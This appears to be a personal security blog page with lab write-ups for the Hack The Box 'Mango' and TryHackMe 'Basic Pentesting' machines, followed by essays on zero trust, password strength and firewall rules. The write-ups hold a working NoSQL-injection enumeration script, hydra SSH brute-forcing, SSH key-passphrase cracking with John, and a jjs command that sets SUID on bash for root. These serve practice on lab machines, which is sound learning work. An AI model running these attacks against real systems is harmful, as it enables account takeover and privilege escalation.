Hack The Box – Mango

Whilst I’m not going to post about all of the machines I try on Hack The Box, I’ll likely post about ones where I learnt something new, and this was an interesting one for me that took me a while to work through and think about.

I made some effort not to spoil it for myself as this is an older retired machine, but the name hints that the backend is likely MongoDB, a NoSQL database. I have some experience with basic authentication bypass via manipulating operators in field values, such as $eq (equals) and $ne (not equals).

When I checked the login page and saw username=admin&password=admin&login=login in the request, I suspected I could attempt a simple password-not-equals injection to bypass the authentication process.

The response indicated that it was being processed by the backend, presumably a NoSQL DB, but it redirected me to an error page, so I used Burp to try a few other auth bypass attempts and to extract some data. It is also worth noting that the website uses PHP, which parses bracketed query string inputs into an array, so I can use [$regex] to search for a value in the DB.
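To make the mechanics concrete, here is a minimal Python sketch (illustrative only, not the site’s actual backend code) of how PHP’s bracket syntax lets a POST parameter smuggle a MongoDB operator into the query:

```python
# Illustrative sketch (not the site's actual code) of how PHP's bracket
# syntax turns a query-string key into a nested array that the backend
# then passes straight into the MongoDB query filter.
def php_style_parse(params):
    """Mimic PHP parsing key[subkey]=value into a nested array."""
    parsed = {}
    for key, value in params.items():
        if key.endswith("]") and "[" in key:
            outer, inner = key[:-1].split("[", 1)
            parsed.setdefault(outer, {})[inner] = value
        else:
            parsed[key] = value
    return parsed

# What the browser sends:
post_body = {"username[$regex]": "^a", "password[$ne]": "x", "login": "login"}

# What the backend effectively passes to db.users.find(...):
query = php_style_parse(post_body)
print(query)
# {'username': {'$regex': '^a'}, 'password': {'$ne': 'x'}, 'login': 'login'}
```

Instead of comparing the literal string "username[$regex]" against a stored name, the backend ends up evaluating an operator, which is the injection.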

I started by confirming this works by checking for a username starting with ‘a’, which is an obvious place to start, but also because I had noted that ‘admin’ was used in the website source as an email address.

Luckily we get the expected response, which is a 302.

A non-match, which I get when repeating the test but searching for a username starting with ‘b’, just responds with a 200.

At this point I suspected we could use this method to enumerate the username and potentially the password. I’m not a programmer, so this was an interesting challenge. I did a bit more research on NoSQL injection and it seemed pretty straightforward, so I started to write some code that loops through the printable characters for the username, appending any that respond with a 302 and going through the loop again until we have the full username.

This is the code I wrote and ran, giving me the username of ‘admin’.

#!/usr/bin/env python3
# Enumerate the username character by character via a $regex oracle:
# a 302 redirect means the growing prefix matches a user in the database,
# while a 200 means no match.

import re
import string

import requests

url = 'http://staging-order.mango.htb/'
username = ""
done = False

while not done:
    done = True
    for c in string.printable:
        data = {
            # Anchor the escaped prefix so only usernames starting with it match
            "username[$regex]": f"^{re.escape(username + c)}.*$",
            # Always true, so the response depends only on the username
            "password[$ne]": "admin",
            "login": "login"
        }
        r = requests.post(url, data=data, allow_redirects=False)
        if r.status_code == 302:
            done = False
            username += c  # keep the character and start the loop again
            print(c)

print(f"Username: {username}")

However, I’d need to extend this code so it would keep looking for additional usernames starting with other characters and then switch to checking passwords against those usernames. I’m confident that with enough time I could get this working, and I still plan to do so, but it would likely take me a while and I wanted to own this machine… So after a quick search I found code that does just this, which can be found here: https://book.hacktricks.xyz/pentesting-web/nosql-injection
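For what it’s worth, here is a rough sketch of how that extension might look, abstracting the 302-vs-200 check into a reusable “oracle” so the same loop can enumerate either field. The URL and field names come from the box above, but the structure is my own and untested against it:

```python
#!/usr/bin/env python3
# Sketch: extending the enumeration to an arbitrary field by abstracting the
# 302-vs-200 check into a boolean "oracle", so the same loop can grow a
# username prefix or, with a fixed username, a password prefix.
import re
import string

def enumerate_field(oracle, charset=string.printable):
    """Grow a prefix one character at a time while the oracle confirms a match."""
    value = ""
    while True:
        for c in charset:
            if oracle(f"^{re.escape(value + c)}"):
                value += c
                break
        else:
            return value  # no character extends the prefix: the field is complete

def make_http_oracle(url, field, fixed):
    """Oracle that POSTs a $regex probe for `field` (302 redirect = match)."""
    def oracle(pattern):
        import requests  # only needed when actually probing the target
        data = {f"{field}[$regex]": pattern, "login": "login", **fixed}
        r = requests.post(url, data=data, allow_redirects=False)
        return r.status_code == 302
    return oracle

# Local self-check with a fake oracle, no network required:
secret = "mango#1"
assert enumerate_field(lambda p: re.match(p, secret) is not None) == secret

# Against the box it would then be something like:
#   user_oracle = make_http_oracle("http://staging-order.mango.htb/",
#                                  "username", {"password[$ne]": "x"})
#   username = enumerate_field(user_oracle)
#   pass_oracle = make_http_oracle("http://staging-order.mango.htb/",
#                                  "password", {"username": username})
#   password = enumerate_field(pass_oracle)
```

Finding additional usernames would need a further tweak (excluding already-known names from the regex), which is exactly the kind of logic the linked script handles.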

After running this code (it does take a while) I get the following output, showing an ‘admin’ and a ‘mango’ user, both with enumerated passwords.

As nmap showed that SSH was listening, I tried connecting to the target with the admin account, but that did not work. Trying with mango’s credentials gave me access as the user mango.

Note: I always try to have something running in the background looking for other information or potential avenues of exploitation. To this effect I was running gobuster, but it didn’t really come up with much of interest.

Once I am on the target I usually do a few things, such as checking /etc/passwd to see what users are available and whether any may have privileges, and running ‘sudo -l’ to check if the user can run any commands with elevated privileges. Whilst I saw the admin account in /etc/passwd, nothing else stood out, so I next searched for files with the SUID bit set, using the command

find / -perm -4000 2>/dev/null

This finds a few interesting files, but the one that stands out to me is “/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs”, which I know is an old Java command line tool to interpret scripts or run an interactive shell.

I also want to upload and run linpeas.sh, so I start a basic HTTP server on my local machine via the command python3 -m http.server 80 and then use wget on the target to fetch linpeas.sh. Once it has run, and after checking through the output, it confirms that ‘jjs’ is a good candidate.

Prior to continuing I look for the user flag, and as it is not in mango’s home directory I change to the other account I found earlier, ‘admin’, via the command su - admin, and here I find the user flag.

Time to check GTFOBins for a way to leverage ‘jjs’ to escalate my privileges. I find an example, which I slightly modify to set the SUID bit on bash so I can then run bash and elevate my access. I run the command jjs and then, inside the interactive shell, run:

Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /bin/bash').waitFor()

This sets the SUID bit on bash, which I can then run with /bin/bash -p to gain an escalated bash prompt. From here it is a simple matter to get the root flag in the /root directory.

Final Thoughts

I really enjoyed this machine, especially gaining the user access, as it required some NoSQL injection, which I’ve only basic experience in (SQL databases are more common in my experience), and also having to write some code to automate the enumeration.

This latter part was very interesting to me as I have not done a lot of coding since university and am trying to practice more Python when I get the chance, which is not often. The root access was a little simple, but that is typically the case once a user level foothold is gained on the target.

The video of my attempt at this machine can be found here: https://youtu.be/q8gVAEWn2vg

Zero Trust Network – Hype Cycle?

As the hype cycle of artificial intelligence and machine learning starts to wane, a new contender for the marketecture focus has emerged. Well, it has been around for many years but is getting a lot more attention recently, where almost all the network and security vendors typically have it, or a reference to it, on their front page… That is, of course, ‘zero trust’.

I for one welcome the focus on zero trust, even though it is somewhat a misnomer (but more on that later), as it helps direct attention to an area of network security that I think has been a struggle for a long time. It has been part of network security, albeit in more niche areas, for many years, mainly in wireless deployments, where mobility of the user is inherent and thus network location cannot be relied upon to provide a comprehensive security posture. Typically this was part of a mobility strategy where the user’s or system’s identity formed the basis of how security posture and controls were applied.

Fast forward 5-10 years, and with the increasing adoption of public cloud, which has further eroded, or at least stretched and evolved, the normal boundaries of a network, a more holistic approach to leveraging identity for network controls and access is gaining momentum.

Therefore, when I discuss the meaning of zero trust I consider treating every connection the same as the foundation: every connection has no implied trust or untrust, enabling the right access to the right destination at the right time. The benefit of this is that being “off-net” is no longer an inhibitor, and security controls can be proactively extended to all applications. It is key to understand that zero trust is not a product, technology, standard, pattern or process, but rather a principle that spans all technology domains.

Additionally, contrary to much vendor and industry marketing, the perimeter did not disappear, and it is not that trust is no longer required; rather, how trust is leveraged and considered is now another tool in the tool belt, where trust is assigned based on the identity, posture and requirements of an entity rather than inherited from location or connectivity medium. It is still important to understand the boundaries of the network, to enable an enhanced definition of policies for users and resources and of the criteria to log, monitor and inspect activities within those boundaries, with further understanding of expected behaviors provided by micro-segmentation and identity.

A zero trust implementation is a marathon, not a sprint: focus on the greatest risks first and iterate over time. In the network it is also important not to attempt to control every connection, especially early on, but rather to work towards grouping connectivity based on identity and segmentation, keeping the controls at the edge of the segment whilst leveraging the richer information provided by identity, visibility and logging within the network to make more informed security and control decisions.

Once the identity of the entity that wants to establish a connection is known, a control can authenticate and authorize the connection to the destination based on a policy. For example, a firewall could block all traffic to an application by default, but based on its verified knowledge of the identity of the entity trying to establish the connection it could allow that connection to pass. This can be extended to specific destinations and specific times, all defined in a policy, regardless of the entity’s location.
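As a toy illustration of that paragraph, a default-deny, identity-based check might look like the sketch below. All names and fields are invented for illustration, not any vendor’s API:

```python
# Toy illustration of an identity-based, default-deny control: all names and
# fields here are invented for this sketch, not any vendor's API.
from dataclasses import dataclass
from datetime import time

@dataclass
class Policy:
    identity: str        # verified identity of the requesting entity
    destination: str     # application the entity wants to reach
    start: time          # allowed window start
    end: time            # allowed window end

POLICIES = [
    Policy("alice@corp.example", "payroll-app", time(8, 0), time(18, 0)),
]

def authorize(identity, destination, now):
    """Allow only if a policy matches identity, destination and time of day."""
    for p in POLICIES:
        if (p.identity == identity and p.destination == destination
                and p.start <= now <= p.end):
            return True
    return False  # default deny, regardless of where the request came from

print(authorize("alice@corp.example", "payroll-app", time(9, 30)))  # True
print(authorize("alice@corp.example", "payroll-app", time(23, 0)))  # False
```

Note that the source network or location appears nowhere in the decision, which is the point.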

An important capability for a zero trust approach is not just to enable conditional access, but also to ensure that access is secure, by preventing exploits, vulnerabilities and other attacks. This requires both a clear understanding of what should or should not be traversing the network and the visibility to measure, learn and adapt, which means the network controls can no longer focus just on layer 4 (whilst this is still important) but also need better insight into layer 7.

Conceptually, the steps an organisation needs to undertake to adopt a zero trust approach are to define the landscape to which zero trust will be applied, identify the users, map that identity to the access they are authorised for, distribute the policy to the controls that will enforce the access, and monitor the connection to ensure it maintains compliance with the policy. This is an iterative process and can be represented as follows:

To enable the adoption of a zero trust approach, the network, meaning both the traffic traversing the network and the devices enabling it, needs to support identity based controls, along with the ability to segment or isolate and remove any undesired or compromised component or traffic flow on demand.

Underpinning the ability to define the landscape is a micro-segmentation approach in the network, where workloads are segmented based on security, support and operational requirements, with well defined zones for administration activities and shared services. This not only allows simplification of controls but also aids in the visibility of compromised or mis-configured components.

Final Thoughts

As I mentioned at the start of this thought dump, zero trust is often misunderstood or misportrayed as meaning no entity, be it user, application or system, should be trusted at all. Trust is still required (perhaps you need to trust your identity store, or the links used to connect components), but that trust should not be implied without better consideration of what, how and why a connection is required. This is likely a long journey which cannot be completed with the purchase or implementation of a technology, but rather by adopting a micro-segmentation approach, which allows policies to be tailored to network zones and the expected behaviors and capabilities within those zones, and by identifying the requestor of connections along with who or what is making the request.

Whilst the zero trust question cannot be solved with technology alone, it also requires a new approach and new way of thinking, acknowledging that most connectivity will originate from, or be destined to, an entity outside of the organisation’s network, be it administrators working from home or applications deployed to Platform as a Service (PaaS), all with the goal of providing the least amount of access required for a user or function to accomplish a specific task.

To realise this zero trust approach, the network controls need to incorporate identity information to make decisions about what access to resources is enabled and what the user is authorised to do, in a dynamic and automated way, along with uplifting the ways of working to leverage these capabilities.

Therefore, the best place to start a zero trust journey is with the way you think about security and the mindset of applying controls, expanding the focus from the deeply ingrained network centric approach to a more holistic view of what is actually required. Also, trying to do this without an underpinning of network automation will likely lead to lax or overbearing controls.

TryHackMe – Basic PenTest

A long long time ago in a country far far away I worked briefly in a CyberSecurity organisation that performed pentesting and auditing. My main area of focus was network and network security, thus looking at network reachability, exposure, routing, and auditing (and hardening) network infrastructure, mainly Cisco routers, switches and firewalls.

I’ve focused more on the network side of architecture for the last decade after doing some time as a network security domain architect, so when I came across tryhackme and hack the box I was pretty excited to delve back into it.

I thought I’d start off with something pretty easy and thus what follows is my write up and experience. I’ll likely post a few more writeups as I do more machines as I mostly use this as a place to reflect and capture some of my experience, therefore this is likely not the best or most efficient example of how to pwn these machines, but that is not the point… it is to have some fun and hopefully learn (and dust off) some new skills along the way.

I decided to start off with the ‘room’ called Basic Pentesting which utilises:

  • service enumeration
  • brute forcing
  • hash cracking
  • Linux enumeration

I’ve tried to provide some of the more interesting screen shots but also provided the video if anyone wants to watch me stumble through it.

I typically start off with an nmap scan:

My typical nmap command variables are:

-sV: Probe open ports to determine service/version info

-sC: equivalent to --script=default

These are typically not too slow and provide a good amount of data to progress with. I normally also use -v so I can see the output in progress, for a full command of:

nmap -sC -sV -v -oN <output file> <ip address>

Whilst that is running I’ll check whether the target is running a web service, and look at the HTML source to see if there is anything obvious or if I can see what languages are being used. The site is listed as under maintenance, but the source has a comment to check the ‘dev notes section’. I could start busting directories with gobuster or dirbuster, but decide to just try some manual directories, and after a few tries find the /development directory, which has a few notes providing a clue to two users, J and K, and also that J is using a weak password.

I also note from my nmap scan that SMB is running, and as nmap indicated the server was Ubuntu, I decide to run enum4linux. This is probably a good place to point out that as this is a for-purpose ‘hack’ box I’m not worried about being noisy, but in a real world pentest one would typically try to be more stealthy and mask some of the scans and enumeration. Enum4linux shows that SMB has ‘Anonymous’ access enabled, so I connect via the command smbclient //<IP address>/Anonymous and find a text file that provides the user names ‘Jan’ and ‘Kay’.

I already know that Jan is using a weak password, so it is a good opportunity to try and brute force it, which I do with hydra, using the command:

hydra -l jan -P <password list> ssh://<IP address>

As you can see, I used ‘jan’ as the user and the trusty rockyou.txt as the password list, and after a few moments managed to brute force the password. Now having Jan’s password, and knowing from the nmap scan that SSH is listening, I connect using Jan’s credentials.

I poke around a bit but decide to upload linpeas, which is a great local Linux privilege escalation enumeration script. This shows that Kay’s private key is readable with Jan’s access, so I grab Kay’s SSH private key, ‘id_rsa’.

I first attempt to connect using Kay’s SSH key but it is protected with a passphrase.

It is now time to try and crack Kay’s private key with John the Ripper. I first convert the private key into a crackable hash using ‘ssh2john’, and then get to cracking. I manage to crack Kay’s passphrase with the command:

john --wordlist=<password list> <Kay's converted key hash>

Once the passphrase is cracked, we can use Kay’s SSH key and the cracked passphrase to SSH into the target as Kay, which enables me to find the final flag for this room.

Final Thoughts

This was a great way to get back into the groove: whilst it was simple, it did utilise a few different techniques to achieve the goal of obtaining access to the target. There are a few other methods I would potentially try if doing this again, as whilst this room is easily achieved with tools or scripts, there are more manual methods that could achieve the same outcome, but hey, why reinvent the wheel…

I really think that regardless of your level of experience, these hacking sites are a great way to improve your skills, but perhaps more importantly they provide some insight into how to consider deploying and managing your own network, specifically how it can be protected, be it at home or for the organisation you work for.

As mentioned, this room was basic and didn’t require any new or unpublished vulnerability, but as a lot of people in the IT industry know, most breaches are via known and published vulnerabilities and exploits. Further to that, it also leans into how technology is connected, and security really is only as strong as the weakest link.

Addendum: As I have started playing around more with tryhackme and hackthebox, I’ve come across many great experts in the community that provide a much more detailed, correct and entertaining view into cybersecurity and I’d like to shout out to some of my favorites, being John Hammond and IppSec. I recommend you search them up on youtube as they have a lot of great content!

Update 12/07/21: I recently re-did this room so I could record it and provide a link here: https://youtu.be/pFnSCaN4kGA

Passwords are so passe

Passwords are ubiquitous when dealing with user authentication, but they are perhaps also the weakest link in security authentication. They generally require the user to maintain a complex yet easy to remember string, which can be somewhat of a contradiction: the requirement to recall the string generally leads to it being based on, or related to, a known word or something personal to the user, ultimately easy for a human to remember, and hence reduced in complexity and randomness. A possible workaround is to not allow user (human) generated passwords, and rather have the password automatically generated by an application using suitable complexity; however, this tends to lead to other issues, such as users documenting their password or reusing the same password on many systems.

Perhaps the best method to date is to use a password manager. I started doing this myself a couple of years back and, while each has its pros and cons, I’ve never looked back.

In 2010 an analysis was performed on the 32 million passwords that were publicly published from the December 2009 Rockyou.com breach.

Some of the key findings of the study include:

  • About 30% of users chose passwords whose length is equal or below six characters.
  • Moreover, almost 60% of users chose their passwords from a limited set of alpha-numeric characters.
  • Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutive digits, adjacent keyboard keys, and so on). The most common password among Rockyou.com account owners is “123456”.

Additionally, further studies show that this insecure trend sadly hasn’t shifted, with 26% of users reusing the same password for important accounts such as email, banking or shopping, and social networking sites.

To provide some context the following tables represent the approximate maximum time required to guess each password using a simple brute force “key-search” attack.

[Table: mixed-62 – approximate brute force times for passwords drawn from 62 mixed alphanumeric characters]

As can be seen using only mixed alpha and numerical characters even for a password with a character length of 8 it is still feasible to retrieve the password in a short time. It also should be noted that there are many ways to improve the speed that these passwords could be cracked.

[Table: mixed-96 – approximate brute force times for passwords drawn from 96 mixed alphanumeric and symbol characters]

Even using all 96 mixed alpha, numerical and symbols for a 6 character length password does not provide enough complexity.
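The arithmetic behind these tables is easy to reproduce. A small sketch, assuming a hypothetical rate of 10 billion guesses per second (a plausible figure for GPU hardware against a fast hash; real speeds vary enormously with the hash used):

```python
# Reproducing the keyspace arithmetic behind the tables above. The guess rate
# is a hypothetical 10 billion guesses/second; real attack speeds depend
# heavily on the hash algorithm and hardware.
GUESSES_PER_SECOND = 10_000_000_000

def worst_case_days(alphabet_size, length):
    """Days to exhaust the full keyspace of alphabet_size ** length passwords."""
    return alphabet_size ** length / GUESSES_PER_SECOND / 86_400

for alphabet, label in [(62, "mixed-62"), (96, "mixed-96")]:
    for length in (6, 8, 10):
        print(f"{label} length {length}: {worst_case_days(alphabet, length):.4f} days")
```

Under these assumptions an 8-character mixed-62 password falls in well under a day, while moving to 10 characters pushes the worst case past a thousand days, illustrating that length contributes far more than alphabet size.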

The NASA guidelines, recommend that all passwords be at least eight characters, and contain a mix of four different types of characters – upper case letters, lower case letters, numbers, and special characters such as !@#$%^&*,;” If there is only one letter or special character, it should not be either the first or last character in the password.

In addition to password complexity guidelines, other factors should be taken into account, such as:

  • Not displaying the password as it is being entered or obscuring it as it is typed by using asterisks (*) or bullets (•).
  • Requiring users to re-enter their password after a period of inactivity (screensaver)
  • Using encrypted tunnels / protocols (SSH, IPSec, SSL) to protect transmitted passwords.
  • Limiting the number of allowed failures within a given time period (to prevent repeated password guessing).
  • Introducing a delay between password submission attempts to slow down automated password guessing programs.
  • Requiring passwords are not shared between users / systems.
  • Requiring periodic password changes. The frequency for periodic password changes is a widely debated topic, and whilst the accepted dogma was to force password changes somewhere between 3-6 months, recently some evidence has emerged suggesting that forcing password changes is perhaps not a good idea, and in fact less secure.
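The failure limiting and delay bullets above can be sketched as a simple policy. The thresholds here are illustrative numbers, not a recommendation:

```python
# Sketch of the lockout and delay bullets above; the thresholds are
# illustrative policy numbers, not a recommendation.
import time

MAX_FAILURES = 5       # failed attempts allowed per rolling window
WINDOW_SECONDS = 300   # window length in seconds

failures = []          # timestamps of recent failed attempts

def record_failure(now=None):
    """Record a failed login; return the delay to impose before the next try."""
    now = time.time() if now is None else now
    failures.append(now)
    recent = [t for t in failures if now - t < WINDOW_SECONDS]
    if len(recent) >= MAX_FAILURES:
        return float("inf")           # locked out for the rest of the window
    return 2 ** (len(recent) - 1)     # doubling delay: 1s, 2s, 4s, 8s ...

print([record_failure(now=100 + i) for i in range(5)])  # [1, 2, 4, 8, inf]
```

The growing delay makes automated guessing expensive long before the hard lockout triggers, while barely affecting a legitimate user who mistypes once or twice.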

More details can be found here.

However, given the general insecurity of relying on passwords for authentication, it is recommended that they be coupled with other security measures, such as two-factor authentication, limited access, and regular password assessments.

My View:

All systems should enforce that mixed alpha, numerals & symbols be used, with a minimum of 8 characters to ensure suitable complexity.

Additionally, user and administrator passwords should be periodically audited to ensure they meet the complexity requirements, are not based on easily guessable or brute forceable dictionary words, and that the same password is not used by the same person on multiple systems with differing security risk levels.

If possible a password manager should be mandated. Whilst this is a cost for the company this is IMHO far outweighed by the increased security and ease of use which can be applied. Most modern password management applications also support auto filling in forms and passwords which can greatly improve the user experience whilst only requiring the user to remember one secure password.

If possible users should be encouraged to use passphrases rather than passwords as these are generally longer and more complex than passwords.

Finally, one of the biggest security concerns with passwords is protecting them, thus ensuring they are salted and hashed when stored on any system is paramount, so that if they are stolen it is not feasible for the attacker to recover them.

Firewall Rule Guidelines

Whilst reviewing my team’s implementation plan I came across some ACLs and firewall rules which I assume had been created some time ago and then continually added to (by another group), as even from a quick glance it was clear that a lot of the rules were redundant, or blatantly incorrect.

It made me recall a simple document I had written a few years back describing my thoughts on guidelines, or principles, for firewall rule management, so I thought it worth repeating here…

  • Access should be specifically permitted.
  • IP address ranges and ports, defined in rules should be as restrictive as practical to match source and destination hosts and ports.
  • Sequential IP addresses that match CIDR boundaries should be combined into as few rules as possible.
  • Rules should be ordered, descending from most frequently to least frequently hit rules.
  • At a minimum, rules should be applied to traffic that ingresses the firewall.
  • The use of NAT should be considered a form of routing, not a type of firewall.
  • The last rule in every ACL should be an explicit deny to all traffic with logging enabled.
  • All rules should be routinely checked for adequacy and removed if not required.

In addition to the above guidelines, the following should be considered and adhered to for firewalls that intersect the public Internet and the organization’s network:

  • Organizations should deny inbound traffic that uses a source or destination IP address from the RFC 1918 range (private IP addresses).
  • Organizations should deny outbound traffic that does not use a source IP address in use by the organization.
  • Organizations should deny inbound traffic that uses a source IP address in use by the organization.
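These three boundary checks can be expressed as a small sketch; 203.0.113.0/24 is a documentation range standing in for the organization’s public prefix:

```python
# Sketch of the three Internet-edge anti-spoofing checks above; 203.0.113.0/24
# is a documentation range used purely as an example organization prefix.
import ipaddress

ORG_PREFIXES = [ipaddress.ip_network("203.0.113.0/24")]
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def in_any(addr, networks):
    """True if addr falls inside any of the given networks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in networks)

def permit(direction, src, dst):
    """Apply the anti-spoofing guidelines at the Internet boundary."""
    if direction == "inbound":
        if in_any(src, RFC1918) or in_any(dst, RFC1918):
            return False  # private addresses have no business arriving inbound
        if in_any(src, ORG_PREFIXES):
            return False  # our own prefix can't legitimately be an inbound source
    if direction == "outbound" and not in_any(src, ORG_PREFIXES):
        return False      # egress filtering: only our own source addresses leave
    return True

print(permit("inbound", "10.1.2.3", "203.0.113.10"))  # False: spoofed private src
print(permit("outbound", "203.0.113.5", "8.8.8.8"))   # True
```

The egress rule is often overlooked, yet it is what stops a compromised internal host participating in spoofed-source attacks against others.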

The following depicts how a firewall rule life-cycle may be managed:

[Diagram: fw-rule-flow – firewall rule life-cycle]

My Recommendations:

Firewalls (yes, even the ones which call themselves next gen firewalls) provide very coarse protection and thus should not be viewed as a complete security solution, especially those deployed at the boundary to the Internet.

Ideally they are coupled with other security controls to provide a more complete protection layer.

It is perhaps preferable to separate the more in-depth protocol analysis into another device, to ensure the firewall is not impacted by this function and to simplify its management, as not all traffic that traverses it will require such in-depth analysis.

It is also recommended that the firewall rules are validated and tested periodically, preferably every quarter, to ensure integrity, protection and adherence to the known configuration state.

Finally, it is recommended that the guidelines and firewall rule life-cycle described above are incorporated into change management and service life-cycle processes and policies.